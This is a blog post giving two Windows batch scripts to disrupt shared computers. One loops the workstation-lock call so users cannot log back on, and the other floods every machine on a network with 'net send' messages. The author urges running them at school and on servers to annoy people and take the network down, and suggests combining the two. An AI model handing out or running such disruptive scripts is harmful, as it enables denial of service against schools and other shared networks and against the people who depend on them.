Sizzled Core logo

How to make some really annoying programs

This is how to make some VERY annoying batch programs almost anywere… like school.

Ok, open notepad and add this code:

@ECHO OFF
:START
rundll32 user32.dll,LockWorkStation
GOTO :START

Then save as whatever.bat

This one locks the work station, and as soon as somebody trys to log back on, it logs them back off again in about half a second, try to get this running on a server, only way to stop it is to restart, and if the server has to restart, then that ****s the network for a bit :devil:

—————————————————————————————

And this one has to one of the most annoying batch files to run on a network, add this code to a batch file:

@ECHO OFF
:START
net send *
GOTO :START

Again save as whatever.bat

This program sends a message of your choice to EVERY computer on the network that is running the messenger service, NT and XP usually always have this running, so again run it at school and piss everybody off.
Or you could combine to two programs so that they cannot even log back on to stop it from sending thousands of messages lol. play around, have fun.

Also if you want to stop the messenger service from running so you dont receive the messages no more do this:

Start > Run > services.msc

Find the messenger service and stop it from running.


If you liked this post: Subscribe by Twitter Follow me on Twitter   or   Subscribe by RSS Subscribe via RSS
Author: Haris Nadeem
He is the founder of Sizzled Core and a Pakistani blogger who loves gadgets and exploring out the web!

One Comment, Comment or Ping

Leave a Reply

Comment moderation is enabled. Your comment may take some time to appear.